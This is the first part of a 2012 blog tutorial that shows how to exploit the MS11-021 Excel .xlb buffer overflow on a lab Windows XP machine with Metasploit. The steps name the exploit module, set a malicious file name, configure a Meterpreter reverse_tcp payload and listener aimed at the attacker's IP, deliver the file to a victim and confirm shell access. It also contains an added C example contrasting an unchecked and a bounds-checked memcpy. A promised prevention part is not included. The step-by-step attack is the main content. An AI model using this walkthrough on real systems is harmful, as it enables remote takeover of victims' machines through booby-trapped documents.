Critical System Protection


MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Exploitation and Prevention part-i 

Feb 22, 2012 11:17 AM

 

I am writing this article in two parts. In the first part I will show you how to exploit the MS11-021 Microsoft Office 2007 Excel .xlb buffer overflow vulnerability on Windows with Metasploit Express Edition, and in the second part I will show you how to prevent exploitation of this vulnerability on Windows with Symantec Critical System Protection (SCSP).
 
MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
 
This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine and the number of bytes to copy, therefore causing a stack-based buffer overflow. This results in arbitrary code execution under the context of the user.
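
The unchecked-copy pattern described above, next to a bounds-checked version, as an added example that is not Excel's code or part of the original article. The record layout (a 2-byte length prefix), the 32-byte buffer and all function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 32  /* assumed size of the fixed stack buffer */
enum { REC_OK = 0, REC_TRUNCATED = -1, REC_TOO_LONG = -2 };

/* Hypothetical record: [len: 2 bytes, little-endian][payload: len bytes]. */

/* Unsafe pattern from the description: source and count both come from the file. */
void copy_field_unsafe(const uint8_t *rec, uint8_t field[FIELD_MAX])
{
    size_t len = (size_t)rec[0] | ((size_t)rec[1] << 8);
    memcpy(field, rec + 2, len);  /* len > FIELD_MAX writes past the buffer */
}

/* Checked form: validate the declared length against both buffers first. */
int copy_field_checked(const uint8_t *rec, size_t rec_size,
                       uint8_t *field, size_t field_size, size_t *copied)
{
    if (rec == NULL || rec_size < 2) return REC_TRUNCATED;
    size_t len = (size_t)rec[0] | ((size_t)rec[1] << 8);
    if (len > rec_size - 2) return REC_TRUNCATED; /* claims more than the file holds */
    if (len > field_size) return REC_TOO_LONG;    /* would overflow the destination */
    memcpy(field, rec + 2, len);
    *copied = len;
    return REC_OK;
}

/* Constructed sample records (not taken from any real .xlb file). */
static const uint8_t SAMPLE_OK[] = {0x03, 0x00, 'a', 'b', 'c'};
static const uint8_t SAMPLE_OVERLONG[2 + 64] = {0x40, 0x00}; /* declares 64 bytes */
static const uint8_t SAMPLE_LYING[] = {0xFF, 0xFF, 'x'};     /* declares 65535 */

/* Parse one record into a FIELD_MAX stack buffer using the checked copy. */
int check_record(const uint8_t *rec, size_t rec_size)
{
    uint8_t field[FIELD_MAX];
    size_t copied = 0;
    return copy_field_checked(rec, rec_size, field, sizeof field, &copied);
}

int main(void)
{
    printf("ok=%d overlong=%d lying=%d\n",
           check_record(SAMPLE_OK, sizeof SAMPLE_OK),
           check_record(SAMPLE_OVERLONG, sizeof SAMPLE_OVERLONG),
           check_record(SAMPLE_LYING, sizeof SAMPLE_LYING));
    return 0;
}
```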
 
Exploitation of MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
 
1. Our victim is using Windows XP Professional SP2 (192.168.42.71), and Microsoft Office 2007 is installed on the victim machine.
 
    
 
2. I am using BackTrack 5 R1 as the attacker machine, and its IP address is 192.168.42.62.
 
3. I am using the windows/fileformat/ms11_021_xlb_bof Metasploit module to exploit the Microsoft Office 2007 Excel .xlb buffer overflow vulnerability (use exploit/windows/fileformat/ms11_021_xlb_bof).
 
    
 
4. To view the available options, run the show options command. I have to set the filename (set filename secret.xlb).
 
    
 
5. I am using the windows/meterpreter/reverse_tcp payload.
 
    
 
6. Now I have to enter LHOST (local host), i.e. 192.168.42.62 (the attacker machine's IP address). Type exploit and hit Enter. It creates a file named secret.xlb.
 
    
 
7. Before sending the secret.xlb file to the victim, I have to set up a listener to catch the connection.
 
8. I am using the multi-handler exploit with the windows/meterpreter/reverse_tcp payload. Set lhost (the attacker machine's IP address) and lport (the attacker machine's port number), type exploit and hit Enter; the listener is then started on the attacker machine.
 
    
 
9. I send the secret.xlb file to our victim.
 
    
 
10. When our victim tries to open the secret.xlb file with Excel, our exploit will execute on his machine and give a shell to the attacker machine.
 
     
 
11. I successfully got a meterpreter shell on our victim machine.
 
     
 
12. Let's type the ipconfig command to verify whether we have entered the victim machine or not.
 
     
 
So I successfully entered the victim machine and got a meterpreter shell on it. In the next part I will show you how to prevent exploitation of the MS11-021 Microsoft Office 2007 Excel .xlb buffer overflow vulnerability on Windows with Symantec Critical System Protection (SCSP).
